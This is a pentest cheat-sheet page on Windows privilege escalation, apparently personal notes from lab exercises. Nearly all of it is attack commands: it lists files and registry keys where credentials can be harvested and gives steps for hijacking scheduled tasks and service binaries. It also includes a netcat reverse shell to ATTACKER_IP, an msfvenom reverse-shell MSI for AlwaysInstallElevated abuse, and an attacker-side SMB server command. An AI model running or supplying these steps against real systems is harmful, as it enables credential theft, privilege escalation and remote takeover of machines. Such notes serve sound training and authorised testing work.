Pentest Tips
  • ABOUT
  • Information Shares
  • CTF
    • Stego
    • Memory
  • Blue Team
    • Tools/Resources
    • One Liners
    • Threat Hunting
    • Scripts
    • Intrusion
  • Web
    • Resources
    • General Web
    • Subdomain Discovery
    • Content Discovery
    • MYSQL
    • Burpsuite
  • Network Exploitation
    • Resources
    • Kerberos
    • Network Based
    • Phishing
    • Metasploit
    • Weaponization
    • Password Cracking
    • Shell Upgrades
    • Linux PrivEsc
    • Windows PrivEsc
    • Windows Persistence
    • Exfiltration
  • Windows Internals
    • Kernal
  • Recon
    • Nmap
    • OSINT
    • SMB Enumeration
    • LDAP
    • Physical
  • Malware
    • Obfuscation
  • Scripting
    • Bash Basics
    • Powershell Basics
  • Cloud
    • AWS
  • Game Hacking
    • Resources
Powered by GitBook
On this page
  • Password Harvesting
  • Quick wins
  • Service based
  • Permission abuse
Edit on GitHub
  1. Network Exploitation

Windows PrivEsc

Password Harvesting

The easiest way to elevate your privileges is to steal credentials from an application.

Unattended Windows Installations:

Credentials left by automatic windows installations may be in:

  • C:\Unattend.xml

  • C:\Windows\Panther\Unattend.xml

  • C:\Windows\Panther\Unattend\Unattend.xml

  • C:\Windows\system32\sysprep.inf

  • C:\Windows\system32\sysprep\sysprep.xml

<Credentials>
    <Username>Administrator</Username>
    <Domain>thm.local</Domain>
    <Password>MyPassword123</Password>
</Credentials>

Powershell History

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Creds

cmdkey /list

runas /savedcred /user:admin cmd.exe

IIS Config

  • C:\inetpub\wwwroot\web.config

  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

From putty:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Quick wins

Scheduled Tasks

:: View Scheduled Tasks
schtasks

:: View more info for each task
schtasks /query /tn vulntask /fo list /v

:: Check if current user can modify the task
icacls c:\path\to\vulntask

:: Spawn a NC shell (assuming NC is installed to c:\tools)
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
schtasks /run /tn vulntask

AlwaysInstallElevated

:: Requires these to be set
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Create a malicious msi to abuse the install perms:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.179.108 LPORT=LOCAL_PORT -f msi -o malicious.msi

Run the msi on the windows instance:

msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Service based

:: Query for service config
sc qc <service name>

:: Check permission of a binary
icacls <path to bin>

:: Create backup of service
move WService.exe WService.exe.bkp

:: Import Malicious service 
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

:: Restart ws
sc stop windowsscheduler 
sc start windowsscheduler

Permission abuse

:: Get Permissions
whoami /priv

Attacker:

mkdir share
opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
PreviousLinux PrivEscNextWindows Persistence

Last updated 2 years ago